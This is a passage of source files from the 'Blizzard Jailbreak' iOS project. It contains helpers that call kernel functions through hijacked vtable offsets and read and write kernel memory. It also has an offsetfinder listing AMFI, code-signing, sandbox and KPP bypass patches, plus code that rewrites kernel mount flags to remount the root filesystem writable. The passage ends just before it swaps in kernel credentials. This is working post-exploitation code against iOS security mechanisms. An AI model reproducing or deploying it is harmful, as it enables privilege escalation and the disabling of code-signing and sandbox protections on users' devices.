vm_size_t csb_hash_pagemask;
vm_size_t csb_hash_pageshift;
vm_size_t csb_hash_firstlevel_pagesize; /* First hash this many bytes, then hash the hashes together */
const CS_CodeDirectory *csb_cd;
const char *csb_teamid;
const CS_GenericBlob *csb_entitlements_blob; /* raw blob, subrange of csb_mem_kaddr */
void * csb_entitlements; /* The entitlements as an OSDictionary */
unsigned int csb_signer_type;
unsigned int csb_reconstituted; // iOS 12 only
/* The following two will be replaced by the csb_signer_type. */
unsigned int csb_platform_binary:1;
unsigned int csb_platform_path:1;
#if __arm64e__
uint64_t csb_pmap_cs_entry;
#endif
};
typedef void (*cs_md_init)(void *ctx);
typedef void (*cs_md_update)(void *ctx, const void *data, size_t size);
typedef void (*cs_md_final)(void *hash, void *ctx);
struct cs_hash {
uint8_t cs_type; /* type code as per code signing */
size_t cs_size; /* size of effective hash (may be truncated) */
size_t cs_digest_size; /* size of native hash */
cs_md_init cs_init;
cs_md_update cs_update;
cs_md_final cs_final;
};
================================================
FILE: AMFI Utilities/osobject.c
================================================
#import <stdlib.h>
#import "../Kernel Utilities/kexecute.h"
#import "../Kernel Utilities/kernel_utils.h"
#import "../PatchFinder/patchfinder64.h"
#include "../Exploits/sock_port/kernel_memory.h"
#import "osobject.h"
/*
 * Byte offsets added to an object's vtable pointer by the wrappers below,
 * written as (slot index * pointer size).
 * NOTE(review): the slot indices are hard-coded; presumably they only match
 * particular kernel builds. Nothing in this file validates them before use.
 */
static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
static uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;
static uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;
static uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;
static uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;
static uint32_t off_OSObject_Release = sizeof(void*) * 0x05;
static uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;
static uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;
static uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;
/*
 * Copies `key` (including its NUL terminator) into a temporary kalloc buffer
 * and runs, through kexecute, the function stored at vtable offset
 * off_OSDictionary_SetObjectWithCharP of the object at `dict`, with the
 * arguments (dict, copied key, val). The temporary buffer is released before
 * returning.
 *
 * Returns the kexecute result narrowed to int.
 * NOTE(review): the kalloc result is written to without being checked.
 */
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
    const size_t key_size = strlen(key) + 1;
    uint64_t kernel_key = kalloc(key_size);
    kwrite(kernel_key, key, key_size);

    uint64_t method = rk64(rk64(dict) + off_OSDictionary_SetObjectWithCharP);
    int result = (int) kexecute(method, dict, kernel_key, val, 0, 0, 0, 0);

    kfree(kernel_key, key_size);
    return result;
}
/*
 * Raw lookup: copies `key` into a temporary kalloc buffer and runs the
 * function at vtable offset off_OSDictionary_GetObjectWithCharP of `dict`
 * with (dict, copied key).
 *
 * The kexecute result is narrowed to int before being returned as uint64_t,
 * so only its low 32 bits survive (sign-extended). OSDictionary_GetItem()
 * passes the value through ZmFixAddr() afterwards.
 */
uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
    const size_t key_size = strlen(key) + 1;
    uint64_t kernel_key = kalloc(key_size);
    kwrite(kernel_key, key, key_size);

    uint64_t method = rk64(rk64(dict) + off_OSDictionary_GetObjectWithCharP);
    int truncated = (int) kexecute(method, dict, kernel_key, 0, 0, 0, 0, 0);

    kfree(kernel_key, key_size);
    return truncated;
}
/*
 * Looks up `key` in the dictionary object at `dict`.
 * Returns 0 when the raw lookup returns 0; otherwise returns the raw value
 * after ZmFixAddr() (presumably restoring the bits lost to the 32-bit
 * truncation in the raw helper - confirm against its definition).
 */
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
    uint64_t item = _OSDictionary_GetItem(dict, key);
    if (item == 0) {
        return item;
    }
    item = ZmFixAddr(item);
    return item;
}
/*
 * Runs the function at vtable offset off_OSDictionary_Merge of `dict` with
 * (dict, aDict) and returns the result narrowed to int.
 */
int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
    uint64_t merge_fn = rk64(rk64(dict) + off_OSDictionary_Merge);
    int merged = (int) kexecute(merge_fn, dict, aDict, 0, 0, 0, 0, 0);
    return merged;
}
/*
 * Runs the function at vtable offset off_OSArray_Merge of `array` with
 * (array, aArray) and returns the result narrowed to int.
 */
int OSArray_Merge(uint64_t array, uint64_t aArray) {
    uint64_t merge_fn = rk64(rk64(array) + off_OSArray_Merge);
    int merged = (int) kexecute(merge_fn, array, aArray, 0, 0, 0, 0, 0);
    return merged;
}
/*
 * Raw element fetch: runs the function at vtable offset off_OSArray_GetObject
 * of `array` with (array, idx) and returns the kexecute result unchanged.
 * No bounds check on `idx` is made here.
 */
uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx) {
    uint64_t getter = rk64(rk64(array) + off_OSArray_GetObject);
    return kexecute(getter, array, idx, 0, 0, 0, 0, 0);
}
/*
 * Fetches element `idx` of the array object at `array`.
 * Returns 0 when the raw fetch returns 0; otherwise the raw value passed
 * through ZmFixAddr().
 */
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx) {
    uint64_t element = _OSArray_GetObject(array, idx);
    if (element == 0) {
        return element;
    }
    element = ZmFixAddr(element);
    return element;
}
/*
 * Runs the function at vtable offset off_OSArray_RemoveObject of `array`
 * with (array, idx); the result is discarded.
 */
void OSArray_RemoveObject(uint64_t array, unsigned int idx) {
    uint64_t remover = rk64(rk64(array) + off_OSArray_RemoveObject);
    (void) kexecute(remover, array, idx, 0, 0, 0, 0, 0);
}
/*
 * Copies the NUL-terminated text in `buffer` into a temporary kalloc buffer
 * and runs the function located by Find_osunserializexml() on it. The second
 * argument (the error-string out pointer) is passed as 0, so no parse error
 * text is retrieved. The temporary buffer is released before returning.
 *
 * Returns the kexecute result unchanged.
 * NOTE(review): the kalloc result is written to without being checked.
 */
uint64_t _OSUnserializeXML(const char* buffer) {
    const size_t xml_size = strlen(buffer) + 1;
    uint64_t kernel_xml = kalloc(xml_size);
    kwrite(kernel_xml, buffer, xml_size);

    const uint64_t no_error_out = 0;
    uint64_t parsed = kexecute(Find_osunserializexml(), kernel_xml, no_error_out, 0, 0, 0, 0, 0);

    kfree(kernel_xml, xml_size);
    return parsed;
}
/*
 * Parses `buffer` via _OSUnserializeXML().
 * Returns 0 when the raw call returns 0; otherwise the raw value passed
 * through ZmFixAddr().
 */
uint64_t OSUnserializeXML(const char* buffer) {
    uint64_t object = _OSUnserializeXML(buffer);
    if (object == 0) {
        return object;
    }
    object = ZmFixAddr(object);
    return object;
}
/*
 * Runs the function at vtable offset off_OSObject_Release of `osobject`
 * with the object as its only argument; the result is discarded.
 */
void OSObject_Release(uint64_t osobject) {
    uint64_t release_fn = rk64(rk64(osobject) + off_OSObject_Release);
    (void) kexecute(release_fn, osobject, 0, 0, 0, 0, 0, 0);
}
/*
 * Runs the function at vtable offset off_OSObject_Retain of `osobject`
 * with the object as its only argument; the result is discarded.
 */
void OSObject_Retain(uint64_t osobject) {
    uint64_t retain_fn = rk64(rk64(osobject) + off_OSObject_Retain);
    (void) kexecute(retain_fn, osobject, 0, 0, 0, 0, 0, 0);
}
/*
 * Runs the function at vtable offset off_OSObject_GetRetainCount of
 * `osobject` and returns the result narrowed to uint32_t.
 */
uint32_t OSObject_GetRetainCount(uint64_t osobject) {
    uint64_t count_fn = rk64(rk64(osobject) + off_OSObject_GetRetainCount);
    uint32_t retain_count = (uint32_t) kexecute(count_fn, osobject, 0, 0, 0, 0, 0, 0);
    return retain_count;
}
/*
 * Runs the function at vtable offset off_OSString_GetLength of `osstring`
 * and returns the result narrowed to unsigned int.
 */
unsigned int OSString_GetLength(uint64_t osstring) {
    uint64_t length_fn = rk64(rk64(osstring) + off_OSString_GetLength);
    unsigned int length = (unsigned int) kexecute(length_fn, osstring, 0, 0, 0, 0, 0, 0);
    return length;
}
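/*
 * Returns a heap copy of the string held by the object at `osstring`,
 * always NUL-terminated. The caller owns the result and must free() it.
 * Returns NULL if the buffer cannot be allocated.
 *
 * The length is whatever OSString_GetLength() reports, so it is treated as
 * untrusted: it is widened to size_t before the +1 so a reported UINT_MAX
 * cannot wrap the allocation size to zero, and the allocation is checked
 * before it is written to.
 */
char *OSString_CopyString(uint64_t osstring) {
    size_t length = OSString_GetLength(osstring);
    char *str = malloc(length + 1);
    if (str == NULL) {
        return NULL;
    }
    kread(OSString_CStringPtr(osstring), str, length);
    str[length] = '\0';
    return str;
}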
================================================
FILE: AMFI Utilities/osobject.h
================================================
#include "../Exploits/sock_port/kernel_memory.h"
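/*
 * Field accessors built on the rk32()/rk64() readers: each one reads a value
 * at a fixed offset from the given object or buffer address.
 * Every macro argument is parenthesized so that an expression argument
 * (for example `i + 1` as an index) is scaled as a whole instead of being
 * split by operator precedence.
 */
#define OSDictionary_ItemCount(dict) rk32((dict) + 20)
#define OSDictionary_ItemBuffer(dict) rk64((dict) + 32)
#define OSDictionary_ItemKey(buffer, idx) rk64((buffer) + 16 * (idx))
#define OSDictionary_ItemValue(buffer, idx) rk64((buffer) + 16 * (idx) + 8)
#define OSString_CStringPtr(str) rk64((str) + 0x10)
#define OSArray_ItemCount(arr) rk32((arr) + 0x14)
#define OSArray_ItemBuffer(arr) rk64((arr) + 32)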
// see osobject.c for info
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
void OSArray_RemoveObject(uint64_t array, unsigned int idx);
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
int OSArray_Merge(uint64_t array, uint64_t aArray);
uint64_t OSUnserializeXML(const char* buffer);
void OSObject_Release(uint64_t osobject);
void OSObject_Retain(uint64_t osobject);
uint32_t OSObject_GetRetainCount(uint64_t osobject);
unsigned int OSString_GetLength(uint64_t osstring);
char *OSString_CopyString(uint64_t osstring);
================================================
FILE: APFS Utilities/IOKit.h
================================================
//
// IOKit.h
// Blizzard Jailbreak
//
// Created by GeoSn0w on 08/10/2020.
// Copyright © 2020 Blizzard Jailbreak. All rights reserved.
//
#ifndef IOKit_h
#define IOKit_h
#define IO_OBJECT_NULL (0)
#include <CoreFoundation/CoreFoundation.h>
typedef mach_port_t io_service_t;
typedef mach_port_t io_connect_t;
typedef mach_port_t io_object_t;
typedef io_object_t io_registry_entry_t;
typedef char io_name_t[128];
typedef char io_struct_inband_t[4096];
extern const mach_port_t kIOMasterPortDefault;
kern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);
io_service_t IOServiceGetMatchingService(mach_port_t _masterPort, CFDictionaryRef matching);
CFMutableDictionaryRef IOServiceMatching(const char* name);
kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t* connect);
io_service_t IOServiceGetMatchingService(mach_port_t _masterPort, CFDictionaryRef matching);
CFMutableDictionaryRef IOServiceMatching(const char* name);
kern_return_t IORegistryEntrySetCFProperties(io_registry_entry_t entry, CFTypeRef properties);
kern_return_t IORegistryEntryGetProperty(io_registry_entry_t entry, const io_name_t propertyName, io_struct_inband_t buffer, uint32_t * size);
io_registry_entry_t IORegistryEntryFromPath(mach_port_t port, char *path);
kern_return_t IOObjectRelease(io_object_t object);
kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6);
kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);
kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);
kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);
kern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);
kern_return_t mach_vm_remap(vm_map_t dst, mach_vm_address_t *dst_addr, mach_vm_size_t size, mach_vm_offset_t mask, int flags, vm_map_t src, mach_vm_address_t src_addr, boolean_t copy, vm_prot_t *cur_prot, vm_prot_t *max_prot, vm_inherit_t inherit);
#endif
/* IOKit_h */
================================================
FILE: APFS Utilities/liboffsetfinder64.hpp
================================================
//
// offsetfinder64.hpp
// offsetfinder64
//
// Created by tihmstar on 10.01.18.
// Copyright © 2018 tihmstar. All rights reserved.
// This is from here: https://github.com/tihmstar/liboffsetfinder64
//
#ifndef offsetfinder64_hpp
#define offsetfinder64_hpp
#include <string>
#include <stdint.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld_images.h>
#include <vector>
#include <stdlib.h>
typedef uint64_t offset_t;
namespace tihmstar {
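// Exception type carrying a numeric code and a message.
//
// what() is declared `const noexcept override` so that it actually overrides
// std::exception::what(); without that signature a handler that catches
// `std::exception &` would get the base-class text instead of _err.
class exception : public std::exception{
    std::string _err;
    int _code;
public:
    exception(int code, std::string err) : _err(err), _code(code) {};
    exception(std::string err) : _err(err), _code(0) {};
    exception(int code) : _code(code) {};
    // Message text; the pointer stays valid for the lifetime of this object.
    const char *what() const noexcept override {return _err.c_str();}
    // Numeric code given at construction (0 when only a message was given).
    int code() const {return _code;}
};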
namespace patchfinder64{
typedef uint8_t* loc_t;
// A byte sequence together with the location it belongs to. The object owns
// a malloc'd copy of the bytes and frees it in the destructor.
class patch{
    bool _slideme;   // true while slide() still has a callback to run
    void(*_slidefunc)(class patch *patch, uint64_t slide);   // optional callback used by slide()
public:
    const loc_t _location;
    const void *_patch;        // heap copy of the bytes, _patchSize long
    const size_t _patchSize;
    // Copies patchSize bytes from `patch` into a fresh allocation.
    // NOTE(review): the malloc result is passed to memcpy without a NULL check.
    patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uint64_t slide) = NULL) : _location(location), _patchSize(patchSize), _slidefunc(slidefunc){
        _patch = malloc(_patchSize);
        memcpy((void*)_patch, patch, _patchSize);
        _slideme = (_slidefunc) ? true : false;
    }
    // Deep copy: the new object gets its own buffer, so the two destructors
    // never free the same pointer.
    // NOTE(review): same unchecked malloc as the main constructor.
    patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy._patchSize){
        _patch = malloc(_patchSize);
        memcpy((void*)_patch, cpy._patch, _patchSize);
        _slidefunc = cpy._slidefunc;
        _slideme = cpy._slideme;
    }
    // Invokes the slide callback once with `slide`; later calls are no-ops.
    void slide(uint64_t slide){
        if (!_slideme)
            return;
        printf("sliding with %p\n",(void*)slide);
        _slidefunc(this,slide);
        _slideme = false; //only slide once
    }
    ~patch(){
        free((void*)_patch);
    }
};
}
class offsetfinder64 {
public:
struct text_t{
patchfinder64::loc_t map;
size_t size;
patchfinder64::loc_t base;
bool isExec;
};
private:
bool _freeKernel;
uint8_t *_kdata;
size_t _ksize;
offset_t _kslide;
patchfinder64::loc_t _kernel_entry;
std::vector<text_t> _segments;
struct symtab_command *__symtab;
void loadSegments(uint64_t slide);
__attribute__((always_inline)) struct symtab_command *getSymtab();
public:
offsetfinder64(const char *filename);
offsetfinder64(void* buf, size_t size, uint64_t base);
const void *kdata();
patchfinder64::loc_t find_entry();
const std::vector<text_t> &segments(){return _segments;};
patchfinder64::loc_t memmem(const void *little, size_t little_len);
patchfinder64::loc_t find_sym(const char *sym);
patchfinder64::loc_t find_syscall0();
uint64_t find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);
/*------------------------ v0rtex -------------------------- */
patchfinder64::loc_t find_zone_map();
patchfinder64::loc_t find_kernel_map();
patchfinder64::loc_t find_kernel_task();
patchfinder64::loc_t find_realhost();
patchfinder64::loc_t find_bzero();
patchfinder64::loc_t find_bcopy();
patchfinder64::loc_t find_copyout();
patchfinder64::loc_t find_copyin();
patchfinder64::loc_t find_ipc_port_alloc_special();
patchfinder64::loc_t find_ipc_kobject_set();
patchfinder64::loc_t find_ipc_port_make_send();
patchfinder64::loc_t find_chgproccnt();
patchfinder64::loc_t find_kauth_cred_ref();
patchfinder64::loc_t find_osserializer_serialize();
uint32_t find_vtab_get_external_trap_for_index();
uint32_t find_vtab_get_retain_count();
uint32_t find_iouserclient_ipc();
uint32_t find_ipc_space_is_task();
uint32_t find_proc_ucred();
uint32_t find_task_bsd_info();
uint32_t find_vm_map_hdr();
uint32_t find_task_itk_self();
uint32_t find_task_itk_registered();
uint32_t find_sizeof_task();
patchfinder64::loc_t find_rop_add_x0_x0_0x10();
patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();
/*------------------------ kernelpatches -------------------------- */
patchfinder64::patch find_i_can_has_debugger_patch_off();
patchfinder64::patch find_lwvm_patch_offsets();
patchfinder64::patch find_remount_patch_offset();
std::vector<patchfinder64::patch> find_nosuid_off();
patchfinder64::patch find_proc_enforce();
patchfinder64::patch find_amfi_patch_offsets();
patchfinder64::patch find_cs_enforcement_disable_amfi();
patchfinder64::patch find_amfi_substrate_patch();
// patchfinder64::patch find_sandbox_patch();
patchfinder64::loc_t find_sbops();
patchfinder64::patch find_nonceEnabler_patch();
/*------------------------ KPP bypass -------------------------- */
patchfinder64::loc_t find_gPhysBase();
patchfinder64::loc_t find_kernel_pmap();
patchfinder64::loc_t find_cpacr_write();
patchfinder64::loc_t find_idlesleep_str_loc();
patchfinder64::loc_t find_deepsleep_str_loc();
/*------------------------ Util -------------------------- */
patchfinder64::loc_t find_rootvnode();
~offsetfinder64();
};
using segment_t = std::vector<tihmstar::offsetfinder64::text_t>;
namespace patchfinder64{
loc_t find_literal_ref(segment_t segemts, offset_t kslide, loc_t pos);
}
}
#endif /* offsetfinder64_hpp */
================================================
FILE: APFS Utilities/offsetfinder.cpp
================================================
// Based on tihmstar's liboffsetfinder64 which is open source here:
// https://github.com/tihmstar/liboffsetfinder64
// Also Coolstar's implementation from Electra.
#include <stdint.h>
#include <stdio.h>
#include "rootfs_remount.h"
#include "liboffsetfinder64.hpp"
using namespace std;
using namespace tihmstar;
extern "C" uint64_t offset_vfs_context_current;
extern "C" uint64_t offset_vnode_lookup;
extern "C" uint64_t offset_vnode_put;
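// Resolves three symbols from the on-disk kernelcache, stores them in the
// offset_* globals and adds `slide` to each. Returns true on success and
// false if any step throws.
//
// The offsetfinder64 object is constructed inside the try block: this
// function has C linkage, so an exception escaping it (for example from the
// constructor, if it throws when the file cannot be opened or parsed) would
// not be caught by the handlers below and would not reach a C caller.
extern "C" bool offsetizeRN(uint64_t slide){
    printf("Initializing OffsetFinder...\n");
    try {
        offsetfinder64 fi("/System/Library/Caches/com.apple.kernelcaches/kernelcache");
        offset_vfs_context_current = (uint64_t)fi.find_sym("_vfs_context_current");
        offset_vnode_lookup = (uint64_t)fi.find_sym("_vnode_lookup");
        offset_vnode_put = (uint64_t)fi.find_sym("_vnode_put");
        printf(" Offsetfinder: GOT: vfs_context_current: %p\n", (void *)offset_vfs_context_current);
        printf(" Offsetfinder: GOT: vnode_lookup: %p\n", (void *)offset_vnode_lookup);
        printf(" Offsetfinder: GOT: vnode_put: %p\n", (void *)offset_vnode_put);
        offset_vfs_context_current += slide;
        offset_vnode_lookup += slide;
        offset_vnode_put += slide;
        printf("OffsetFinder: The OffsetFinder ran successfully! Continuing...\n");
        return true;
    } catch (tihmstar::exception &e){
        printf("OffsetFinder: The OffsetFinder has failed! Aborting... %d (%s)\n", e.code(), e.what());
        return false;
    } catch (std::exception &e){
        printf("OffsetFinder: Could not properly initialize the OffsetFinder! %s\n", e.what());
        return false;
    }
}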
================================================
FILE: APFS Utilities/rootfs_remount.h
================================================
//
// rootfs_remount.h
// electra1131
//
// Created by CoolStar on 6/7/18.
// Copyright © 2018 CoolStar. All rights reserved.
//
#ifndef rootfs_remount_h
#define rootfs_remount_h
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <copyfile.h>
int file_exists(const char *filename);
#define cp(to, from) copyfile(from, to, 0, COPYFILE_ALL)
#ifdef __cplusplus
extern "C" {
#endif
extern int shouldReboot;
int remountRootFS(void);
int unjailbreakBlizzard(void);
#ifdef __cplusplus
}
#endif
#endif /* rootfs_remount_h */
================================================
FILE: APFS Utilities/rootfs_remount.m
================================================
// Thanks to the Electra Team and Pwn20wnd!
/* APFS snapshot mitigation bypass bug by CoolStar, exploitation by Pwn20wnd */
/* Disables the new APFS snapshot mitigations introduced in iOS 11.3 */
#include <stdio.h>
#import <sys/snapshot.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <CoreFoundation/CoreFoundation.h>
#include "rootfs_remount.h"
#include "snapshot_tools.h"
#include <spawn.h>
#include "../Exploits/sock_port/kernel_memory.h"
#include "../Exploits/sock_port/exploit.h"
#include "../Kernel Utilities/kernel_utils.h"
#include "../PatchFinder/patchfinder64.h"
#include "../Kernel Utilities/kexecute.h"
#include "../Exploits/sock_port/offsetof.h"
#include "../Kernel Utilities/system_reboot.h"
#include "../Blizzard Jailbreak/BlizzardLog.h"
#include "../Blizzard Jailbreak/blizzardJailbreak.h"
#include "../APFS Utilities/snapshot_tools.h"
#define ROOTFSTESTFILE "/.BlizzardJB"
#define ROOTFSMNT "/var/rootfsmnt"
#define APPLESNAP "com.apple.os.update-"
#include "../Kernel Utilities/kernSymbolication.h"
uint64_t offset_vfs_context_current;
uint64_t offset_vnode_lookup;
uint64_t offset_vnode_put;
char *diskLocation = "/dev/disk0s1s1";
int shouldReboot = 0;
void dumpContentsOfDir(char *path);
// From http://newosxbook.com/src.jl?tree=&file=/xnu-1504.15.3/bsd/hfs/hfs_mount.h
struct hfs_mount_args {
char *fspec; /* block special device to mount */
uid_t hfs_uid; /* uid that owns hfs files (standard HFS only) */
gid_t hfs_gid; /* gid that owns hfs files (standard HFS only) */
mode_t hfs_mask; /* mask to be applied for hfs perms (standard HFS only) */
u_int32_t hfs_encoding; /* encoding for this volume (standard HFS only) */
struct timezone hfs_timezone; /* user time zone info (standard HFS only) */
int flags; /* mounting flags, see below */
int journal_tbuffer_size; /* size in bytes of the journal transaction buffer */
int journal_flags; /* flags to pass to journal_open/create */
int journal_disable; /* don't use journaling (potentially dangerous) */
};
/*
 * Returns 1 if access(filename, F_OK) succeeds, 0 otherwise.
 * This is a point-in-time answer only; the path can change between this
 * check and any later use of it.
 */
int file_exists(const char *filename) {
    return access(filename, F_OK) == 0;
}
static uint64_t _vnode_lookup = 0;
static uint64_t _vnode_put = 0;
static uint64_t _vfs_context_current = 0;
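/*
 * Runs the kernel's vnode_lookup on `path` through kexecute, with the
 * arguments (kernel copy of path, flags, 8-byte result slot, vfs_context),
 * and stores the value read back from the result slot in *vnode.
 *
 * The function address comes from find_symbol() plus kernel_slide, falling
 * back to Find_vnode_lookup() when the symbol lookup returns 0.
 *
 * Returns 0 on success, -1 when the call reports a non-zero result; *vnode
 * is left untouched in that case. Both temporary kernel buffers are released
 * on every path (the failure path used to return without freeing them).
 */
int vnode_lookup(const char *path, int flags, uint64_t *vnode, uint64_t vfs_context) {
    size_t len = strlen(path) + 1;
    uint64_t ptr = kalloc(8);
    uint64_t ptr2 = kalloc(len);
    kwrite(ptr2, path, len);

    _vnode_lookup = find_symbol("_vnode_lookup", false);
    if (!_vnode_lookup) {
        _vnode_lookup = Find_vnode_lookup();
    } else {
        _vnode_lookup += kernel_slide;
    }

    int rc = -1;
    if (!kexecute(_vnode_lookup, ptr2, flags, ptr, vfs_context, 0, 0, 0)) {
        *vnode = rk64(ptr);
        rc = 0;
    }

    kfree(ptr2, len);
    kfree(ptr, 8);
    return rc;
}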
/*
 * Resolves vfs_context_current (find_symbol() plus kernel_slide, or
 * Find_vfs_context_current() when the symbol lookup returns 0), runs it
 * through kexecute with a first argument of 1, and returns the result after
 * ZmFixAddr(). The resolved address is cached in _vfs_context_current.
 */
uint64_t get_vfs_context() {
    _vfs_context_current = find_symbol("_vfs_context_current", false);
    if (_vfs_context_current) {
        _vfs_context_current += kernel_slide;
    } else {
        _vfs_context_current = Find_vfs_context_current();
    }
    return ZmFixAddr(kexecute(_vfs_context_current, 1, 0, 0, 0, 0, 0, 0));
}
/*
 * Resolves vnode_put (find_symbol() plus kernel_slide, or Find_vnode_put()
 * when the symbol lookup returns 0) and runs it on `vnode` through kexecute.
 * Returns the result narrowed to int.
 */
int vnode_put(uint64_t vnode) {
    _vnode_put = find_symbol("_vnode_put", false);
    if (_vnode_put) {
        _vnode_put += kernel_slide;
    } else {
        _vnode_put = Find_vnode_put();
    }
    int rc = (int)kexecute(_vnode_put, vnode, 0, 0, 0, 0, 0, 0);
    return rc;
}
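/*
 * Mounts the device `devpath` at `path` with filesystem type "apfs" and
 * mount flags 0, passing a zeroed hfs_mount_args with fspec, hfs_mask and the
 * current timezone filled in.
 *
 * Returns mount()'s result. perror() is called only when mount() fails;
 * calling it after a successful mount printed whatever stale errno was left
 * by an earlier call, which made the log misleading.
 */
int mountDevAtPathAsRW(const char* devpath, const char* path) {
    struct hfs_mount_args mntargs;
    /* bzero (not "= {0}") so padding bytes handed to mount() are zero too */
    bzero(&mntargs, sizeof(struct hfs_mount_args));
    mntargs.fspec = (char*)devpath;
    mntargs.hfs_mask = 1;
    gettimeofday(NULL, &mntargs.hfs_timezone);

    int rvtmp = mount("apfs", path, 0, (void *)&mntargs);
    if (rvtmp != 0) {
        perror("mount");
    }
    return rvtmp;
}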
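/*
 * Returns the value vnode_lookup() produces for `path`, using the context
 * from get_vfs_context().
 *
 * On failure a message is printed and (uint64_t)-1 is returned, so callers
 * must compare the result against that sentinel (and 0) before using it as
 * an address.
 *
 * The result slot is a local variable: the previous 8-byte malloc was never
 * checked for NULL before vnode_lookup() wrote through it.
 */
uint64_t getVnodeAtPath(const char *path) {
    uint64_t vnode = 0;
    if (vnode_lookup(path, 0, &vnode, get_vfs_context())) {
        printf("ROOT FS REMOUNT: Unable to get vnode from path for %s\n", path);
        return -1;
    }
    printf("GOT VNODE: 0x%llx\n", vnode);
    return vnode;
}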
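// Clears MNT_NOSUID, MNT_RDONLY and MNT_ROOTFS in the mount flags reached
// from the vnode of "/", asks mount() for an MNT_UPDATE of "/", writes the
// cleared flags again, then checks writability by creating /RWTEST.
// Returns YES if /RWTEST exists afterwards, NO otherwise.
//
// Changes from the previous version:
//  - getVnodeAtPath() returns (uint64_t)-1 on failure; that sentinel (and 0)
//    is now rejected before it is used as the base of a kernel read/write.
//  - The probe file is created 0644 instead of 0777, so the test does not
//    leave a world-writable, executable file in the root directory.
//  - close() is skipped when neither open() nor creat() produced a descriptor.
// NOTE(review): the vnode obtained here is never passed to vnode_put(),
// unlike the one in remountRootFS(); confirm whether a reference is leaked.
BOOL remount1126() {
    uint64_t rootfs_vnode = getVnodeAtPath("/");
    printf("\nROOT FS REMOUNT: vnode of /: 0x%llx\n", rootfs_vnode);
    if (rootfs_vnode == 0 || rootfs_vnode == (uint64_t)-1) {
        printf("ROOT FS REMOUNT: Unable to get the vnode of /\n");
        return NO;
    }

    uint64_t v_mount = rk64(rootfs_vnode + off_v_mount);
    uint32_t v_flag = rk32(v_mount + off_mnt_flag);
    printf("ROOT FS REMOUNT: Clearing FS Flags\n");
    printf("ROOT FS REMOUNT: Flags before 0x%x\n", v_flag);
    v_flag &= ~MNT_NOSUID;
    v_flag &= ~MNT_RDONLY;
    v_flag &= ~MNT_ROOTFS;
    printf("ROOT FS REMOUNT: Flags after 0x%x\n", v_flag);
    wk32(v_mount + off_mnt_flag, v_flag);

    char *nmz = strdup("/dev/disk0s1s1");
    int rv = mount("apfs", "/", MNT_UPDATE, (void *)&nmz);
    free(nmz);
    printf("ROOT FS REMOUNT: Remounting /, return value = %d\n", rv);

    // Re-read the mount pointer and write the flags once more after the update.
    v_mount = rk64(rootfs_vnode + off_v_mount);
    wk32(v_mount + off_mnt_flag, v_flag);

    int fd = open("/RWTEST", O_RDONLY);
    if (fd == -1) {
        fd = creat("/RWTEST", 0644);
    } else {
        printf("ROOT FS REMOUNT: File already exists! Good!\n");
    }
    if (fd != -1) {
        close(fd);
    }

    BOOL writable = [[NSFileManager defaultManager] fileExistsAtPath:@"/RWTEST"];
    printf("ROOT FS REMOUNT: %s\n", writable ? "Successful!" : "FAILED!");
    return writable ? YES : NO;
}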
// Entry point for making the root filesystem writable. Returns 0 on success
// and -1 on failure. Sets the global shouldReboot to 1 when the snapshot
// branch is taken and to 0 otherwise.
//
// NOTE(review): list_snapshots() in snapshot_tools.c returns 0 on success and
// -1 on error, so as written the first branch is entered only when listing
// fails. Confirm that this is the intended condition.
int remountRootFS() {
    int rv = -1, ret = -1;
    if (kCFCoreFoundationVersionNumber > 1451.51 && list_snapshots("/")) {
        printf("****** DOING THE HARD REMOUNT ******\n");
        shouldReboot = 1;
        uint64_t devVnode = getVnodeAtPath("/dev/disk0s1s1");
        // getVnodeAtPath() signals failure with (uint64_t)-1.
        if (devVnode == 0 || devVnode == -1){
            printf("FAIL!\n");
            return -1;
        }
        // Zero the spec flags word reached through the device vnode.
        uint64_t specinfo = rk64(devVnode + off_v_specinfo);
        wk32(specinfo + off_specflags, 0);
        // NOTE(review): the mount point is created mode 0777 (subject to umask)
        // under /var, and the rmdir/mkdir/chown results are not checked.
        if ([[NSFileManager defaultManager] fileExistsAtPath:@"/var/rootfsmnt"])
            rmdir("/var/rootfsmnt");
        mkdir("/var/rootfsmnt", 0777);
        chown("/var/rootfsmnt", 0, 0);
        printf("ROOT FS REMOUNT: Temporarily setting kernel credentials\n");
        // `creds` is the value written back to this process's ucred field below.
